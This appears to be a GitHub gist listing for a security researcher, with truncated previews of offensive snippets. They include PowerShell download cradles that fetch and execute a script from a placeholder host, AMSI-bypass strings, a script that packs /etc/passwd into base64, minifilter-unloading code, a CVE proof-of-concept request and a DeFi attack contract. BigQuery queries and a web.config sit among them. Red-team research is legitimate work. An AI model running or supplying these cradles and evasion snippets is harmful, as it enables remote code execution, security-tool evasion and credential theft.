Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
View Invoke-RestMethod with cookie and header.ps1
@rvrsh3ll
rvrsh3ll / SANSReflection.txt
Created Oct 23, 2021 — forked from jfmaes/SANSReflection.txt
Register for the SEC699 ;-)
View SANSReflection.txt
Hi SANS Workshop Attendees! Reflection is super fun!
amsi.dll
AmsiScanBuffer
uFcAB4DD
View bigquerybitcoin
with double_entry_book as (
-- debits
SELECT
array_to_string(inputs.addresses, ",") as address
, block_timestamp
, -inputs.value as value
FROM `bigquery-public-data.crypto_bitcoin.inputs` as inputs
WHERE DATE(block_timestamp) >= '2011-1-1' and DATE(block_timestamp) <= '2014-1-1'
UNION ALL
View AttackContract.sol
pragma solidity ^0.6.0;
import "./TrusterLenderPool.sol";
contract AttackerContract{
uint256 public totalTokens = 1000000 ether;
address public attackerAddress;
// DamnValuableToken public dvTokenContract;
address public dvTokenContract;
TrusterLenderPool public poolContract;
@rvrsh3ll
rvrsh3ll / read-file-gzip-base64.ps1
Created Aug 6, 2021 — forked from FrankSpierings/read-file-gzip-base64.ps1
Read file, gzip and convert to base64.
View read-file-gzip-base64.ps1
$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();
[System.Convert]::ToBase64String($ms.ToArray());
@rvrsh3ll
rvrsh3ll / Web.config
Created May 30, 2021
Azure Web App Example Web.config
View Web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap fileExtension=".iso" mimeType="application/octet-stream" />
<mimeMap fileExtension=".exe" mimeType="application/octet-stream" />
<mimeMap fileExtension=".zip" mimeType="application/x-zip-compressed" />
</staticContent>
</system.webServer>
</configuration>
@rvrsh3ll
rvrsh3ll / Unload_Minifilter.c
Created May 29, 2021 — forked from OsandaMalith/Unload_Minifilter.c
Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter. It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
View Unload_Minifilter.c
#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter.
View PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>
@rvrsh3ll
rvrsh3ll / BigQuery_ETH.txt
Created Feb 18, 2021
Google BigQuery Ethereum Addresses
View BigQuery_ETH.txt
#standardSQL
with double_entry_book as (
-- debits
select to_address as address, value as value
from `bigquery-public-data.crypto_ethereum.traces`
where to_address is not null
and status = 1
and (call_type not in ('delegatecall', 'callcode', 'staticcall') or call_type is null)
union all
-- credits